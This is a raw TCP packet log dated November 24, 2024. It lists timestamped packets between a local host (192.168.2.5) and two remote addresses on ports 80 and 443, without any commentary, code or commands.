                                                                                                                                                                                        Nov 24, 2024 02:13:28.179238081 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.179966927 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.180012941 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.180077076 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.180829048 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.180875063 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.180917025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.181653023 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.181695938 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.181706905 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.182495117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.182542086 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.182585001 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.183357954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.183403015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.183407068 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.184146881 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.184187889 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.184228897 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.184998035 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.185041904 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.185106039 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.185823917 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.185870886 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.185878992 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.186651945 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.186700106 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.186734915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.187103033 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.187241077 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.187294006 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.187443018 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.187458038 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.187469959 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.187477112 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.187509060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.187608957 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.187625885 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.188316107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.188395023 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.188436031 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.189157009 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.189218044 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.189251900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.190001965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.190118074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.190145016 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.190839052 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.190944910 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.190974951 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.191195965 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.191221952 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.191284895 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.191529036 CET49735443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.191543102 CET4434973513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.191654921 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.191701889 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.191757917 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.192507029 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.192596912 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.192615986 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.193331957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.193375111 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.193420887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.194154978 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.194264889 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.194289923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.194946051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.194998026 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.258991957 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.259478092 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.259502888 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.260103941 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.260111094 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.279687881 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.279783964 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.279885054 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.280065060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.280179024 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.280225992 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.280917883 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.280998945 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.281095028 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.281780005 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.281897068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.281944990 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.282632113 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.282751083 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.282802105 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.283422947 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.283462048 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.283539057 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.284260988 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.284378052 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.284436941 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.285070896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.285178900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.285224915 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.285932064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.286039114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.286737919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.286781073 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.286837101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.287246943 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.287575006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.287681103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.287722111 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.288415909 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.288531065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.288810968 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.289222002 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.289330006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.289376020 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.290066957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.290174961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.290283918 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.290900946 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.291018009 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.291068077 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.291760921 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.291865110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.291922092 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.292563915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.292592049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.292742968 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.293414116 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.293494940 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.293543100 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.294250011 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.294318914 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.294421911 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.295105934 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.295160055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.295207024 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.295914888 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.296041012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.296119928 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.296760082 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.296873093 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.296914101 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.297580957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.297646999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.297700882 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.298432112 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.298547983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.298594952 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.299251080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.299374104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.299413919 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.300098896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.300165892 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.300844908 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.300932884 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.300959110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.301789999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.301846027 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.301911116 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.301992893 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.302602053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.302676916 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.302717924 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.303442001 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.303559065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.304179907 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.304266930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.304337025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.304387093 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.305089951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.305162907 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.305262089 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.305941105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.306075096 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.306123018 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.306803942 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.306819916 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.306863070 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.307629108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.307756901 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.307847977 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.308454037 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.308557034 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.308644056 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.309263945 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.309370995 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.309422970 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.310123920 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.310226917 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.310302019 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.310950041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.311053991 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.311120033 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.311774015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.311866045 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.311908007 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.312592983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.312715054 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.312756062 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.313469887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.313497066 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.314029932 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.314274073 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.314376116 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.314897060 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.315082073 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.315207958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.315268993 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.315943956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.316039085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.316569090 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.316777945 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.316891909 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.316939116 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.317604065 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.317723036 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.317804098 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.318464041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.318567038 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.318613052 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.319276094 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.319380999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.319423914 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.320141077 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.320265055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.320316076 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.320945978 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.321039915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.321088076 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.321774006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.321799994 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.321968079 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.322601080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.322757959 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.322804928 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.323412895 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.369029999 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.418001890 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.429965019 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.442327023 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.442472935 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.442537069 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.442744017 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.442756891 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.442766905 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.442773104 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.445581913 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.445617914 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.445729017 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.445898056 CET49736443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.445910931 CET4434973613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.525152922 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.525235891 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.525295019 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.525803089 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.525825024 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.525840044 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.525849104 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.529725075 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.529771090 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.529843092 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.530149937 CET49737443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:28.530169964 CET4434973713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.537477970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.537559032 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.537616014 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.537889957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.537976980 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.538026094 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.549423933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.549539089 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.549587965 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.549869061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.549967051 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.550004959 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.550688982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.550736904 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.550908089 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.551516056 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.551598072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.551636934 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.552325010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.552386999 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.552423000 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.553153038 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.553210974 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.553373098 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:28.553977013 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.554040909 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:28.554080963 CET4972980192.168.2.5185.215.113.16
